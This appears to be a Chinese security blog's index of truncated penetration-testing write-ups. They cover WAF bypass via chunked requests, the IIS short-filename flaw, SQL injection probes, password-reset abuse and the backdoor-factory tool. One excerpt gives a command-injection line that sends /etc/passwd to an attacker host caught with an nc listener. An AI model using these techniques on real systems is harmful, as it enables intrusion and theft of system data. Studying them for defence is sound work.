技巧1 使用注释扰乱分块数据包 一些如Imperva、360等比较好的WAF已经对Transfer-Encoding的分块传输做了处理，可以把分块组合成完整的HTTP数据包，这时直接使用常规的分块传输方法尝试绕过的话...

最近吐司论坛里面大佬发出了一个新姿势，于是我就照葫芦画瓢，来复现一番。 吐司大佬的原文章：https://www.t00ls.net/thread-48499-1-1.html 我们先来温习下短文件名漏洞，一般是iis配上.net的...

靶机无回显的情况下，可使用 cancel  来把回显发送到攻击机端 cancel -u '$(cat /etc/passwd)' -h ip:port 攻击机用nc来接收返回信息 nc -lvvp [port] 实例演示： 攻击机ip：192...

项目地址：https://github.com/secretsquirrel/the-backdoor-factory backdoor-factory 看其名知其意，直译过来就是后门工厂的意思。利用其 patch 方式的编码加密技术，可以轻松的生成win32PE后...

漏洞已修复才发的文章 **** ** ==================== 标准的二维码登陆流程如下：    打开web界面进入登陆然后加载二维码    网站开始轮询，来检测二维码状态&nb...

一般来说 CentOS 下的 python 和 yum 都卸载不掉的 默认有保护机制 但是总有某些情况下，给删掉，这次就是看到一位老哥把python和yum都给删了。然后想恢复python救急，于是恰好有时间的我就决定...

http://xxx.com/news_blank.php?id=296 and 1=1 http://xxxxx.com/news_blank.php?id=296+and+1=1 http://xxxxx.com/news_blank.php?id=296+and+1=2 确认是注入 http://xxxx.com/news_blank.ph...

http://www.xxx.com/zxdt_detail.asp?id=1080   看到是注入点，当然首选肯定是先用sqlmap跑下。 access数据库 能正常跑出表 能正常跑出字段  但是dump出数据时就dump不出 没得办法，迫于无奈...

首先先找到忘记密码处。 然后选择账号找回 填写好要重设的账号名后，单击开始验证。 然后使用burp进行抓包，接着单击发送验证码。 此处修改成自己的，如何知道是自己的呢？ 只需重复上面的流程...

随手测试了下，是个注入，于是就打算丢到了sqlmap里面。 可是sqlmap却是抽了疯是的。 看着情况，也不是一时半会能有结果。 于是闲着也是闲着，手工测试一波。 人品常伴我身。root权限。 看到roo...